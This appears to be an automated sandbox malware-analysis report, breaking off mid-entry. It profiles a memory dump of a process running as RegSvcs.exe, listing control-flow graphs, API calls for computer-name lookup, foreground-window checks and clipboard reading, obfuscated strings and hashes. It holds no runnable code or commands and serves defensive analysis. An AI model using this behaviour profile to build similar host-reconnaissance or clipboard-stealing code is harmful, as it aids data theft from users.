                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 535 42f3c5-42f3f4 call 441c60 538 42f400-42f426 535->538 538->538 539 42f428-42f431 538->539 540 42f433-42f43b 539->540 541 42f44b-42f495 call 441c60 539->541 542 42f440-42f449 540->542 546 42f4a0-42f4c5 541->546 542->541 542->542 546->546 547 42f4c7-42f4ce 546->547 548 42f4d0-42f4d6 547->548 549 42f4eb-42f514 GetComputerNameExA 547->549 550 42f4e0-42f4e9 548->550 550->549 550->550
                                                                                                APIs
                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042F4FE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: ComputerName
                                                                                                • String ID: ABQH
                                                                                                • API String ID: 3545744682-2857704541
                                                                                                • Opcode ID: 21a26049c95029f14debd43ff901fc75587960d99a2a052f20e81db94443e019
                                                                                                • Instruction ID: 5b9f06d29d21be6fc1f49ae5373236c4f88bea70ce57d6927e68f4d7a729ffcc
                                                                                                • Opcode Fuzzy Hash: 21a26049c95029f14debd43ff901fc75587960d99a2a052f20e81db94443e019
                                                                                                • Instruction Fuzzy Hash: CC3126742046928FD715CF24D890663BBF2EF66314F14816DD4E21BB42C379685ACBA5

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 004406A2
                                                                                                • GetForegroundWindow.USER32 ref: 004406B1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: ForegroundWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2020703349-0
                                                                                                • Opcode ID: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
                                                                                                • Instruction ID: ab39d18eea59de8c0b680b80bbae726c1476b453b8e9e2f579cb72a53367ea8f
                                                                                                • Opcode Fuzzy Hash: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
                                                                                                • Instruction Fuzzy Hash: 4AD0C7F95905018FD705D771BD8542A36397A4620D38C903DF50741613FD35502A8B5B
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitVariant
                                                                                                • String ID:
                                                                                                • API String ID: 1927566239-0
                                                                                                • Opcode ID: abb8198e76b9dbc638f6b64f0f056e50e4a5a60b888bb2a26f00c9e297661d1a
                                                                                                • Instruction ID: f7f883e2ad49da0fecad536576301c807aa78c4ca5f2a4f40745664147204c84
                                                                                                • Opcode Fuzzy Hash: abb8198e76b9dbc638f6b64f0f056e50e4a5a60b888bb2a26f00c9e297661d1a
                                                                                                • Instruction Fuzzy Hash: 0A414F70108BC08EE365CB38C598757BFE16B56308F48489DD5D68BB92C7BAB509CB62
                                                                                                APIs
                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F62E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: ComputerName
                                                                                                • String ID:
                                                                                                • API String ID: 3545744682-0
                                                                                                • Opcode ID: bef4936573cb1b14369d8eaac4f9090ae5688f478e73a6ad368257c6db6403fa
                                                                                                • Instruction ID: 76e407ce98a51277e7cb13f46241631caeedb7dd1d9a2c9078d1ba909d45b5aa
                                                                                                • Opcode Fuzzy Hash: bef4936573cb1b14369d8eaac4f9090ae5688f478e73a6ad368257c6db6403fa
                                                                                                • Instruction Fuzzy Hash: 122190742046928BEB158F25D4617B3BBE1EF53300F6885AAD4C69B392D7389C86CB64
                                                                                                APIs
                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F62E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: ComputerName
                                                                                                • String ID:
                                                                                                • API String ID: 3545744682-0
                                                                                                • Opcode ID: 2a2e06b06b06b3c81bc5c5135b626a7c0281056ffdb54b32e1af479912c1722b
                                                                                                • Instruction ID: d9a4f91a2702334bf36e07a4eed7b442d690e9a594b68c6ebc6cd94c5554eabc
                                                                                                • Opcode Fuzzy Hash: 2a2e06b06b06b3c81bc5c5135b626a7c0281056ffdb54b32e1af479912c1722b
                                                                                                • Instruction Fuzzy Hash: 7A11A1742046428BEB058F24D8A1BB7BBF2EF56300F5885A9D196DB392D738DC86CB54
                                                                                                APIs
                                                                                                • GetUserDefaultUILanguage.KERNELBASE ref: 0043AAAF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: DefaultLanguageUser
                                                                                                • String ID:
                                                                                                • API String ID: 95929093-0
                                                                                                • Opcode ID: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
                                                                                                • Instruction ID: 2db82b081659a11ebf0adced019d600d4025aec70a5b2eba15313fbfae0b0d52
                                                                                                • Opcode Fuzzy Hash: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
                                                                                                • Instruction Fuzzy Hash: B0112636A482A58FD719DB3CCA4476DBFA26F8A300F0980ADC4C997385CB789D60C753
                                                                                                APIs
                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B51C,00000000,00000001), ref: 00440292
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
                                                                                                • Instruction ID: 9d73e3fc9da24b4a25dc6ea464106973b4d99c6e73c38ef93f1a8f1a834cd47d
                                                                                                • Opcode Fuzzy Hash: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
                                                                                                • Instruction Fuzzy Hash: EFF0203A909200EBE2006F2ABC05A173668BF8A325F020876F000D31A5D738E8218A9B
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: BlanketProxy
                                                                                                • String ID:
                                                                                                • API String ID: 3890896728-0
                                                                                                • Opcode ID: 6d4444b6b1bf2a15e57e1771f38e3a021ca3fddd5c8aadccf2c8c010083366ee
                                                                                                • Instruction ID: 3c134e449782a57cf71f1962354a437f9829e02efeb86ae6b61234eae4da8937
                                                                                                • Opcode Fuzzy Hash: 6d4444b6b1bf2a15e57e1771f38e3a021ca3fddd5c8aadccf2c8c010083366ee
                                                                                                • Instruction Fuzzy Hash: 62F0ED752097028FE300CF24C59874BBBF2BB88304F25891CE4A44B394D7B9AA49CFC2
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: BlanketProxy
                                                                                                • String ID:
                                                                                                • API String ID: 3890896728-0
                                                                                                • Opcode ID: 2e53f1206323ee2cade14c3224eb0fa84b417d36bb7d5e7098e7bca86b682ba1
                                                                                                • Instruction ID: 64921bb5e8d0d2665883c7be70a8893bafea9755363c5f099f224ef3642789f1
                                                                                                • Opcode Fuzzy Hash: 2e53f1206323ee2cade14c3224eb0fa84b417d36bb7d5e7098e7bca86b682ba1
                                                                                                • Instruction Fuzzy Hash: 29F07AB4109701CFE311DF64C5A4B5ABBF0FB85304F11985CE4958B3A1D7B59A49CF92
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B51C,00000000,00000001), ref: 0043E87E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
                                                                                                • Instruction ID: edab8ee5216d5c962334db0beb90db3a31f2e897247f77843e17d527c4ab1b3a
                                                                                                • Opcode Fuzzy Hash: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
                                                                                                • Instruction Fuzzy Hash: F0D0A734188121DFD7005F14FC05B873758DF0A351F020872B404AB1B5C234EC50C69C
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?,67660564,00408969,67660564), ref: 0043E850
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
                                                                                                • Instruction ID: 1c12cdc91dcc22cd6618a30bc84945b256d08a32317763a8f107efb347479c5b
                                                                                                • Opcode Fuzzy Hash: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
                                                                                                • Instruction Fuzzy Hash: E4C09B31145120ABD5103F15FC05FC67F64DF45391F010465B00467076C760BC91C6DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !h#n$&P%V$(X6^$)p*v$-tz$.D)J$.H>N$2{<u$4~|$7w$;T&Z$BpFv$G0]6$K4l:$Rd"j$T8e>$T`Zf$U\$_lYr$`g$o<KB${x$|,X2$8>$rp$tj$x~
                                                                                                • API String ID: 0-2870231824
                                                                                                • Opcode ID: df71505268c028ffb0bd486a89103a37c107dc5adc46b736a241bad54def65e1
                                                                                                • Instruction ID: e4eadb167d9284e983c6371bd9484b3f2b8716763c332f31a73ee98d54a9440e
                                                                                                • Opcode Fuzzy Hash: df71505268c028ffb0bd486a89103a37c107dc5adc46b736a241bad54def65e1
                                                                                                • Instruction Fuzzy Hash: E53209B160C7D48AD334CF14C442BDFBAF2EB92304F00892DC5E96B215D7B6564A8B9B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !h#n$&P%V$(X6^$)p*v$-tz$.D)J$.H>N$2{<u$4~|$7w$;T&Z$BpFv$G0]6$K4l:$Rd"j$T8e>$T`Zf$U\$_lYr$`g$o<KB${x$|,X2$8>$rp$tj$x~
                                                                                                • API String ID: 0-2870231824
                                                                                                • Opcode ID: bb8f5c017a04f448ec77eaa504b06c268e6e3bd4e83d5db79ec8c788eea25bd9
                                                                                                • Instruction ID: 85683be32e8b5f4f428226e946852424525cd865b1790a78dd48afa17569a373
                                                                                                • Opcode Fuzzy Hash: bb8f5c017a04f448ec77eaa504b06c268e6e3bd4e83d5db79ec8c788eea25bd9
                                                                                                • Instruction Fuzzy Hash: 423208B160C7D48AD334CF14C442BDFBAF2EB92304F40892DC5E96B215D7B6564A8B9B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AtP$GpFv$LH$LH$[T
                                                                                                • API String ID: 0-1191849916
                                                                                                • Opcode ID: 9f8a8d8b39a13838edde9a1b50270b6620bdc73dc6028a05be0a7079155c4cee
                                                                                                • Instruction ID: 4372fb21f11b9819d30698d9d45361d0369da0689afe6659426da76e72155524
                                                                                                • Opcode Fuzzy Hash: 9f8a8d8b39a13838edde9a1b50270b6620bdc73dc6028a05be0a7079155c4cee
                                                                                                • Instruction Fuzzy Hash: C872F275600B01CFD724CF29C8917A3B7B2FF8A314B19896DD8968B7A1D739E842CB54
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?,?,?,?,?,00000000,?), ref: 004164C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: AtP$GpFv$LH$LH$[T
                                                                                                • API String ID: 237503144-1191849916
                                                                                                • Opcode ID: 1b588242ea16f88214a7b3f74664b69940c21a90d5ac88c4a02d85973340d39e
                                                                                                • Instruction ID: 33ac3c3fba2e5f2169ec6e70d98a4de6486b49fd6ba05196e176a44067b630e5
                                                                                                • Opcode Fuzzy Hash: 1b588242ea16f88214a7b3f74664b69940c21a90d5ac88c4a02d85973340d39e
                                                                                                • Instruction Fuzzy Hash: D83224756007018FC724CF29C8917A3B7F2FF96314B1A85ADD8968B7A1D739E842CB54
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00424698
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: =jh$D6v4$}z
                                                                                                • API String ID: 237503144-2424248051
                                                                                                • Opcode ID: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
                                                                                                • Instruction ID: 072dcfe1279749a49c563166b893412059df4ddb98baf7635cf88deb1ed00509
                                                                                                • Opcode Fuzzy Hash: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
                                                                                                • Instruction Fuzzy Hash: E071227560C3509FE7208F24EC4175FBBE4EBC2718F10892DF5A49B291DBB4980A8B96
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                • String ID:
                                                                                                • API String ID: 1006321803-0
                                                                                                • Opcode ID: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
                                                                                                • Instruction ID: b86dd0c9fbfd43ae0b58d105ee5404c8a2eb2c5d505c68a19c0745f829c1e84f
                                                                                                • Opcode Fuzzy Hash: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
                                                                                                • Instruction Fuzzy Hash: C941D1B1908B529FD700AF7C988925ABFA0AB06320F05873EE8E5973C6D3389555C797
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AtP$GpFv$LH
                                                                                                • API String ID: 0-40351562
                                                                                                • Opcode ID: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
                                                                                                • Instruction ID: 6bb0aad597ceb399f229923281458bf5411d9ceb9ec5dfacab6a3e1016280f03
                                                                                                • Opcode Fuzzy Hash: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
                                                                                                • Instruction Fuzzy Hash: 04C1F275200B018FC725CF29C891663B7F2FF96314B1A896ED8968B7A5E778F841CB44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: KWYb$R^lf$V]E^$[NC~$puGG
                                                                                                • API String ID: 0-3448173581
                                                                                                • Opcode ID: 68f8decb0507b526bb0b8b235139426a9b71c66a9f93ba188218d6a7d3b065e7
                                                                                                • Instruction ID: 136c07a549b812a85170c773b68f542c8dc67558d112d0f44613d1a83f6642fd
                                                                                                • Opcode Fuzzy Hash: 68f8decb0507b526bb0b8b235139426a9b71c66a9f93ba188218d6a7d3b065e7
                                                                                                • Instruction Fuzzy Hash: 18E16475608601DFC7248F29CC816A777B2FF8A310F19857ED5568B7A1E739E842CB48
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: <$C|$WR$~Bzx$~|
                                                                                                • API String ID: 0-1711356705
                                                                                                • Opcode ID: 759e3f713937f53d1145da5574e760211f3564257749ddce68042d6697c28895
                                                                                                • Instruction ID: c242de3d159764505c2276e72245a45d8931141d93d3f41c6525b63a99f65b4f
                                                                                                • Opcode Fuzzy Hash: 759e3f713937f53d1145da5574e760211f3564257749ddce68042d6697c28895
                                                                                                • Instruction Fuzzy Hash: 3BD1287664C3504BD318CF29885126FBBE3ABC2314F19897EE4D5AB381C779C90A8787
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 2$76$745:2$76$_\]$p@
                                                                                                • API String ID: 0-2055486527
                                                                                                • Opcode ID: 692f9ee771d2d81641aa3ae234354e2c9c2a2707556fcb6c8f5c436a55a784cf
                                                                                                • Instruction ID: d14b64437fda7db03077973c55caa55540a0466a372fa5b5a151a26c722ec16b
                                                                                                • Opcode Fuzzy Hash: 692f9ee771d2d81641aa3ae234354e2c9c2a2707556fcb6c8f5c436a55a784cf
                                                                                                • Instruction Fuzzy Hash: 5CD1CF716183508FD724CF64D891BABBBF0EF95318F04882DE98587392E7B9E845CB46
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042A8EB
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042A97D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: ~
                                                                                                • API String ID: 237503144-2894255414
                                                                                                • Opcode ID: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
                                                                                                • Instruction ID: 0060a675a86d7ee076ee5ed7f34d7278311ae35c8cfae6d949a6dc28de4d3802
                                                                                                • Opcode Fuzzy Hash: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
                                                                                                • Instruction Fuzzy Hash: A351FEB56483459FE350DF61AC81A2FBBB9EB86704F00583CF6809B291DBB0D40ACB47
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $&?3$0-/?$99C?$;(?>
                                                                                                • API String ID: 0-2409071036
                                                                                                • Opcode ID: e133a7b7fa4b30eba9d8dd8762af5ae8fa74075651ce804875519ff4ab040977
                                                                                                • Instruction ID: f66a5fe417f6b708e5f26068a280dd0292c096a76de8314330cd7006a92fc357
                                                                                                • Opcode Fuzzy Hash: e133a7b7fa4b30eba9d8dd8762af5ae8fa74075651ce804875519ff4ab040977
                                                                                                • Instruction Fuzzy Hash: 2AD15EB49007419FD720EF39D586752BFF0EB12300F544AAED8EA4B786D334A45ACB96
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "$MP$`]0o$mooj
                                                                                                • API String ID: 0-750224902
                                                                                                • Opcode ID: b1852bd034d5f07e6c7418944058fbcc2db243f872094cebdf7b16bddf70df29
                                                                                                • Instruction ID: b19b03646b16de912904001b94da70090da2d56033d31c768745f7e78282d27d
                                                                                                • Opcode Fuzzy Hash: b1852bd034d5f07e6c7418944058fbcc2db243f872094cebdf7b16bddf70df29
                                                                                                • Instruction Fuzzy Hash: EC71183150D3929AD711CF29849077BFFE1AF96344F1889BED4C4AB387C639890AC766
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >j%h$YF$]Z
                                                                                                • API String ID: 0-4187760579
                                                                                                • Opcode ID: 315e0b80a172105bdb6125941b7bc3327eb2f506a6e5818f00821b26c43edc6d
                                                                                                • Instruction ID: 9eece3b8ce7a95ea6ecb53f0b37b23c6ac9ce84f3b4a74f9026e79692fb54b94
                                                                                                • Opcode Fuzzy Hash: 315e0b80a172105bdb6125941b7bc3327eb2f506a6e5818f00821b26c43edc6d
                                                                                                • Instruction Fuzzy Hash: CD02037160C3009BD7189F25C8916AFBBF2EFD5314F08892DE4D58B382E7399946C78A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: A529D2F59DB73AF1B960CC18D99B375A$JO}$no
                                                                                                • API String ID: 0-2177157945
                                                                                                • Opcode ID: 39d72df67d6d4dec9bb311bdf5152167ba102bc258e75940eeb29ed02a9edc23
                                                                                                • Instruction ID: a84f769f8163236c19afa71ab8ebfca9a7e40634951dcb5e8a3fb7dd6940477d
                                                                                                • Opcode Fuzzy Hash: 39d72df67d6d4dec9bb311bdf5152167ba102bc258e75940eeb29ed02a9edc23
                                                                                                • Instruction Fuzzy Hash: 5AC1F3B160C3408BD718DF35D8916AFBBE2EBD2304F144A2DE5D29B392DA38C509CB56
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: )2^$khvr$|lx1
                                                                                                • API String ID: 0-2191243274
                                                                                                • Opcode ID: 4ccf6364555e8cdb5bfd8096454ae9d86d60a5367683d88ebbcbe3196d12286d
                                                                                                • Instruction ID: 4de4a3a3beb6c19d42a4d3ade4e4e91008c027f5d3f459ded0861b50ff37b2bd
                                                                                                • Opcode Fuzzy Hash: 4ccf6364555e8cdb5bfd8096454ae9d86d60a5367683d88ebbcbe3196d12286d
                                                                                                • Instruction Fuzzy Hash: 27412974605691CBD7158F3AD490772BBA2AF9B304F5C85ADC4C78B396C6389846CB18
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(D7DADAD1), ref: 0042DE55
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: 3Z{
                                                                                                • API String ID: 3664257935-2331068373
                                                                                                • Opcode ID: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
                                                                                                • Instruction ID: 974a3689560b078f5541bff02c23d3e4bc65e838cbd55ddb6ad84d7362020e57
                                                                                                • Opcode Fuzzy Hash: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
                                                                                                • Instruction Fuzzy Hash: F641F1706047819FE7268F249890B63BFE1AF67304F28449DE4D65F392D72A9806CB65
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: NP,?$EA
                                                                                                • API String ID: 0-3550630486
                                                                                                • Opcode ID: c8b8e796abceac3594a91b638e490a64fbfa8cc7ef476cca3c0e389b64e5e7b0
                                                                                                • Instruction ID: 2e7f34938e04f27cbf53eb242d69fe801042e8981dab05c8edde02431b6dd9ba
                                                                                                • Opcode Fuzzy Hash: c8b8e796abceac3594a91b638e490a64fbfa8cc7ef476cca3c0e389b64e5e7b0
                                                                                                • Instruction Fuzzy Hash: 5E4222B4608201DBD7148F28E841BBB73A1FF86328F154A2DF591572E1E778EC55C78A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
